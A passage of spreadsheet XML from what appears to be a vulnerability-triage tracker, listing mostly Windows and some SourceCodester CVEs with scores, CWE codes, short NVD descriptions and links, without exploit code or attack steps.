      </c>
      <c r="R424" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S424" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69504</t>
        </is>
      </c>
    </row>
    <row r="425">
      <c r="A425" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B425" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C425" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69527</t>
        </is>
      </c>
      <c r="D425" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E425" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F425" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G425" s="5" t="inlineStr"/>
      <c r="H425" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I425" s="5" t="inlineStr"/>
      <c r="J425" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K42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5" s="5" t="inlineStr"/>
      <c r="M425" s="5" t="inlineStr"/>
      <c r="N425" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O425" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P425" s="5" t="inlineStr"/>
      <c r="Q425" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R425" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows USB Mass Storage Class Driver allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S425" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69527</t>
        </is>
      </c>
    </row>
    <row r="426">
      <c r="A426" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B426" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C426" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69616</t>
        </is>
      </c>
      <c r="D426" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E426" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F426" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G426" s="5" t="inlineStr"/>
      <c r="H426" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I426" s="5" t="inlineStr"/>
      <c r="J426" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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6" s="5" t="inlineStr"/>
      <c r="M426" s="5" t="inlineStr"/>
      <c r="N426" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O426" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P426" s="5" t="inlineStr"/>
      <c r="Q426" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R426" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Remote Desktop Services allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S426" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69616</t>
        </is>
      </c>
    </row>
    <row r="427">
      <c r="A427" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B427" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C427" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69627</t>
        </is>
      </c>
      <c r="D427" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E427" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F427" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G427" s="5" t="inlineStr"/>
      <c r="H427" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I427" s="5" t="inlineStr"/>
      <c r="J427" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K42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7" s="5" t="inlineStr"/>
      <c r="M427" s="5" t="inlineStr"/>
      <c r="N427" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O427" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P427" s="5" t="inlineStr"/>
      <c r="Q427" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R427" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Remote Desktop Licensing Service allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S427" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69627</t>
        </is>
      </c>
    </row>
    <row r="428">
      <c r="A428" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B428" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C428" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69808</t>
        </is>
      </c>
      <c r="D428" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E428" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F428" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G428" s="5" t="inlineStr"/>
      <c r="H428" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I428" s="5" t="inlineStr"/>
      <c r="J428" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K42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8" s="5" t="inlineStr"/>
      <c r="M428" s="5" t="inlineStr"/>
      <c r="N428" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O428" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P428" s="5" t="inlineStr"/>
      <c r="Q428" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R428" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Win32K allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S428" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69808</t>
        </is>
      </c>
    </row>
    <row r="429">
      <c r="A429" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B429" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C429" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69862</t>
        </is>
      </c>
      <c r="D429" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E429" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F429" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G429" s="5" t="inlineStr"/>
      <c r="H429" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I429" s="5" t="inlineStr"/>
      <c r="J429" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K42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29" s="5" t="inlineStr"/>
      <c r="M429" s="5" t="inlineStr"/>
      <c r="N429" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O429" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P429" s="5" t="inlineStr"/>
      <c r="Q429" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-200</t>
        </is>
      </c>
      <c r="R429" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Wireless Wide Area Network Service allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S429" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69862</t>
        </is>
      </c>
    </row>
    <row r="430">
      <c r="A430" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B430" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C430" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70145</t>
        </is>
      </c>
      <c r="D430" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E430" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F430" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G430" s="5" t="inlineStr"/>
      <c r="H430" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I430" s="5" t="inlineStr"/>
      <c r="J430" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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30" s="5" t="inlineStr"/>
      <c r="M430" s="5" t="inlineStr"/>
      <c r="N430" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O430" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P430" s="5" t="inlineStr"/>
      <c r="Q430" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R430" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Windows Search Component allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S430" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70145</t>
        </is>
      </c>
    </row>
    <row r="431">
      <c r="A431" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B431" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C431" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70290</t>
        </is>
      </c>
      <c r="D431" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E431" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F431" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G431" s="5" t="inlineStr"/>
      <c r="H431" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I431" s="5" t="inlineStr"/>
      <c r="J431" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K43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31" s="5" t="inlineStr"/>
      <c r="M431" s="5" t="inlineStr"/>
      <c r="N431" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O431" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P431" s="5" t="inlineStr"/>
      <c r="Q431" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="R431" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Windows Win32 Kernel Subsystem allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S431" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70290</t>
        </is>
      </c>
    </row>
    <row r="432">
      <c r="A432" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B432" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C432" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71341</t>
        </is>
      </c>
      <c r="D432" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E432" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F432" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G432" s="5" t="inlineStr"/>
      <c r="H432" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I432" s="5" t="inlineStr"/>
      <c r="J432" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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32" s="5" t="inlineStr"/>
      <c r="M432" s="5" t="inlineStr"/>
      <c r="N432" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O432" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P432" s="5" t="inlineStr"/>
      <c r="Q432" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R432" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Partition Management Driver allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S432" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71341</t>
        </is>
      </c>
    </row>
    <row r="433">
      <c r="A433" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B433" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C433" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73008</t>
        </is>
      </c>
      <c r="D433" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E433" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F433" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G433" s="5" t="inlineStr"/>
      <c r="H433" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I433" s="5" t="inlineStr"/>
      <c r="J433" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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3" s="5" t="inlineStr"/>
      <c r="M433" s="5" t="inlineStr"/>
      <c r="N433" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O433" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P433" s="5" t="inlineStr"/>
      <c r="Q433" s="5" t="inlineStr">
        <is>
          <t>CWE-359</t>
        </is>
      </c>
      <c r="R433" s="5" t="inlineStr">
        <is>
          <t>Exposure of private personal information to an unauthorized actor in Windows Biometric Service allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S433" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73008</t>
        </is>
      </c>
    </row>
    <row r="434">
      <c r="A434" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B434" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C434" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77488</t>
        </is>
      </c>
      <c r="D434" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E434" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F434" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G434" s="5" t="inlineStr"/>
      <c r="H434" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I434" s="5" t="inlineStr"/>
      <c r="J434" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K434" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L434" s="5" t="inlineStr"/>
      <c r="M434" s="5" t="inlineStr"/>
      <c r="N434" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O434" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P434" s="5" t="inlineStr"/>
      <c r="Q434" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="R434" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in SQL Server allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S434" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77488</t>
        </is>
      </c>
    </row>
    <row r="435">
      <c r="A435" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B435" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C435" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77491</t>
        </is>
      </c>
      <c r="D435" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E435" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F435" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G435" s="5" t="inlineStr"/>
      <c r="H435" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I435" s="5" t="inlineStr"/>
      <c r="J435" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K43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35" s="5" t="inlineStr"/>
      <c r="M435" s="5" t="inlineStr"/>
      <c r="N435" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O435" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P435" s="5" t="inlineStr"/>
      <c r="Q435" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R435" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows GDI allows an unauthorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S435" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77491</t>
        </is>
      </c>
    </row>
    <row r="436">
      <c r="A436" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B436" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C436" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78454</t>
        </is>
      </c>
      <c r="D436" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E436" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F436" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G436" s="5" t="inlineStr"/>
      <c r="H436" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I436" s="5" t="inlineStr"/>
      <c r="J436" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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36" s="5" t="inlineStr"/>
      <c r="M436" s="5" t="inlineStr"/>
      <c r="N436" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O436" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P436" s="5" t="inlineStr"/>
      <c r="Q436" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R436" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows CD-ROM Driver allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S436" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78454</t>
        </is>
      </c>
    </row>
    <row r="437">
      <c r="A437" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B437" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C437" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83501</t>
        </is>
      </c>
      <c r="D437" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E437" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F437" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G437" s="5" t="inlineStr"/>
      <c r="H437" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I437" s="5" t="inlineStr"/>
      <c r="J437" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K437" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L437" s="5" t="inlineStr"/>
      <c r="M437" s="5" t="inlineStr"/>
      <c r="N437" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O437" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P437" s="5" t="inlineStr"/>
      <c r="Q437" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R437" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Virtualization-Based Security (VBS) Enclave allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S437" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83501</t>
        </is>
      </c>
    </row>
    <row r="438">
      <c r="A438" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B438" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C438" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83991</t>
        </is>
      </c>
      <c r="D438" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E438" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F438" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G438" s="5" t="inlineStr"/>
      <c r="H438" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I438" s="5" t="inlineStr"/>
      <c r="J438" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K43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38" s="5" t="inlineStr"/>
      <c r="M438" s="5" t="inlineStr"/>
      <c r="N438" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O438" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P438" s="5" t="inlineStr"/>
      <c r="Q438" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R438" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function in Windows Cloud Files Mini Filter Driver allows an authorized attacker to perform tampering locally.</t>
        </is>
      </c>
      <c r="S438" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83991</t>
        </is>
      </c>
    </row>
    <row r="439">
      <c r="A439" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B439" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C439" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86220</t>
        </is>
      </c>
      <c r="D439" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E439" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F439" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G439" s="5" t="inlineStr"/>
      <c r="H439" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I439" s="5" t="inlineStr"/>
      <c r="J439" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K439" s="5" t="inlineStr"/>
      <c r="L439" s="5" t="inlineStr"/>
      <c r="M439" s="5" t="inlineStr"/>
      <c r="N439" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O439" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P439" s="5" t="inlineStr"/>
      <c r="Q439" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="R439" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in SourceCodester Class and Exam Timetabling System 1.0. The affected element is the function mysqli_query of the file /admin/modal_add_course.php. The manipulation of the argument course results in sql injection. The attack can be launched remotely. The exploit is now public and may be used.</t>
        </is>
      </c>
      <c r="S439" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86220</t>
        </is>
      </c>
    </row>
    <row r="440">
      <c r="A440" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B440" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C440" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86221</t>
        </is>
      </c>
      <c r="D440" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E440" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F440" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G440" s="5" t="inlineStr"/>
      <c r="H440" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I440" s="5" t="inlineStr"/>
      <c r="J440" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K440" s="5" t="inlineStr"/>
      <c r="L440" s="5" t="inlineStr"/>
      <c r="M440" s="5" t="inlineStr"/>
      <c r="N440" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O440" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P440" s="5" t="inlineStr"/>
      <c r="Q440" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="R440" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in SourceCodester Class and Exam Timetabling System 1.0. The impacted element is the function mysqli_query of the file /admin/modal_add_course1.php. This manipulation of the argument course causes sql injection. The attack may be initiated remotely. The exploit has been published and may be used.</t>
        </is>
      </c>
      <c r="S440" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86221</t>
        </is>
      </c>
    </row>
    <row r="441">
      <c r="A441" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B441" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C441" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86223</t>
        </is>
      </c>
      <c r="D441" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E441" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F441" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G441" s="5" t="inlineStr"/>
      <c r="H441" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I441" s="5" t="inlineStr"/>
      <c r="J441" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K441" s="5" t="inlineStr"/>
      <c r="L441" s="5" t="inlineStr"/>
      <c r="M441" s="5" t="inlineStr"/>
      <c r="N441" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O441" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P441" s="5" t="inlineStr"/>
      <c r="Q441" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="R441" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in SourceCodester Class and Exam Timetabling System 1.0. This impacts the function mysqli_query of the file /admin/modal_add_coursea.php. Performing a manipulation of the argument course results in sql injection. Remote exploitation of the attack is possible. The exploit has been made public and could be used.</t>
        </is>
      </c>
      <c r="S441" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86223</t>
        </is>
      </c>
    </row>
    <row r="442">
      <c r="A442" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B442" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C442" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86225</t>
        </is>
      </c>
      <c r="D442" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E442" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F442" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G442" s="5" t="inlineStr"/>
      <c r="H442" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I442" s="5" t="inlineStr"/>
      <c r="J442" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K442" s="5" t="inlineStr"/>
      <c r="L442" s="5" t="inlineStr"/>
      <c r="M442" s="5" t="inlineStr"/>
      <c r="N442" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O442" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
